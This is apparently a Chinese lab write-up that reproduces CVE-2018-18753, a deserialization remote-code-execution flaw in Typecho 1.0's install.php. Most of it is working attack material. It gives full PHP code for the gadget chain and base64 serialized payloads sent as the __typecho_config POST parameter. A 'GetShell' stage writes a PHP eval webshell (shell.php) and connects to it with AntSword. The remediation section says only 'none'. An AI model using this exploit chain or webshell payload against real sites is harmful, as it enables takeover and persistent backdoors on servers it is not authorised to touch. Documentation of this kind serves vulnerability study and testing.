typecho_14.10.10反序列化漏洞复现

typecho_14.10.10_unserialize _ CVE-2018-18753

说明	内容
漏洞编号	CVE-2018-18753
漏洞名称	Typecho CMS 反序列化漏洞
漏洞评级	高危
影响范围	typecho1.0(14.10.10)
漏洞描述	typecho是博客CMS，前台install.php 文件存在反序列化漏洞，通过构造的反序列化字符串注入可以执行任意PHP 代码。
修复方案	升级 打补丁 上设备

漏洞描述

Typecho原本是一款博客系统,其框架体系有别于市面上一般意义MVC框架,主体代码以自创的Widget为基类,整体非常简洁。

typecho是博客CMS，前台install.php 文件存在反序列化漏洞，通过构造的反序列化字符串注入可以执行任意PHP 代码。

漏洞等级

高危

影响版本

• typecho1.0(14.10.10)

漏洞复现

基础环境

组件	版本
OS	windows server 2016
Web Server	chrome
typecho	14.10.10

漏洞验证

1. 编写POC

   
   class Typecho_Feed{
   	const RSS1 = 'RSS 1.0';
   	const RSS2 = 'RSS 2.0';
   	const ATOM1 = 'ATOM 1.0';
      	const DATE_RFC822 = 'r';
   	const DATE_W3CDTF = 'c';
   	const EOL = "\n";
   	private $_type;
   	private $_items;
   	
   	public function __construct(){
   		$this->_type = $this::RSS2;
   		$this->_items[0] = array(
   			'title' => '1',
   			'link' => '1',
   			'date' => 1508895132,
   			'category' => array(new Typecho_Request()),
   			'author' => new Typecho_Request(),
   		);
   	}
   }
   
   class Typecho_Request{
   	private $_params = array();
   	private $_filter = array();
   
   	public function __construct(){
   		$this->_params['screenName'] = 'phpinfo()';
   		$this->_filter[0] = 'assert';
       }
   }
   
   $exp = array(
   	'adapter' => new Typecho_Feed(),
   	'prefix' => 'typecho_'
   );
   
   echo base64_encode(serialize($exp));
   ?>
   

2. 执行命令获取poc

   YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30
   

   

3. 访问typecho的install.php页面，变量为finish

   http://192.168.117.164/typecho_1.0-14.10.10/install.php?finish=
   

   

4. 使用POST请求，将poc写入，前面加上变量__typecho_config，phpinfo命令成功执行

   __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30
   

   

深度利用

命令执行

将POC中的代码进行修改，重复验证步骤，即可达到命令执行

GetShell

1. 将POC中的命令进行修改，改为一句话木马，在同级生成一个shell.php文件

   
   class Typecho_Feed{
   	const RSS1 = 'RSS 1.0';
   	const RSS2 = 'RSS 2.0';
   	const ATOM1 = 'ATOM 1.0';
      	const DATE_RFC822 = 'r';
   	const DATE_W3CDTF = 'c';
   	const EOL = "\n";
   	private $_type;
   	private $_items;
   	
   	public function __construct(){
   		$this->_type = $this::RSS2;
   		$this->_items[0] = array(
   			'title' => '1',
   			'link' => '1',
   			'date' => 1508895132,
   			'category' => array(new Typecho_Request()),
   			'author' => new Typecho_Request(),
   		);
   	}
   }
   
   class Typecho_Request{
   	private $_params = array();
   	private $_filter = array();
   
   	public function __construct(){
   		$this->_params['screenName'] = "fputs(fopen('shell.php', w), '')";
   		$this->_filter[0] = 'assert';
       }
   }
   
   $exp = array(
   	'adapter' => new Typecho_Feed(),
   	'prefix' => 'typecho_'
   );
   
   echo base64_encode(serialize($exp));
   ?>
   

2. 访问POC，生成恶意代码

   YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjcxOiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywgdyksICc8P3BocCBwaHBpbmZvKCk7QGV2YWwoJF9SRVFVRVNUWzMzM10pPz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjcxOiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywgdyksICc8P3BocCBwaHBpbmZvKCk7QGV2YWwoJF9SRVFVRVNUWzMzM10pPz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30
   

3. 使用POST请求写入POC

   __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjcxOiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywgdyksICc8P3BocCBwaHBpbmZvKCk7QGV2YWwoJF9SRVFVRVNUWzMzM10pPz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjcxOiJmcHV0cyhmb3Blbignc2hlbGwucGhwJywgdyksICc8P3BocCBwaHBpbmZvKCk7QGV2YWwoJF9SRVFVRVNUWzMzM10pPz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30
   

   

4. 蚁剑连接

   http://192.168.117.164/typecho_1.0-14.10.10/shell.php
   

   

   

漏洞挖掘

网络测绘

Typecho

修复建议

无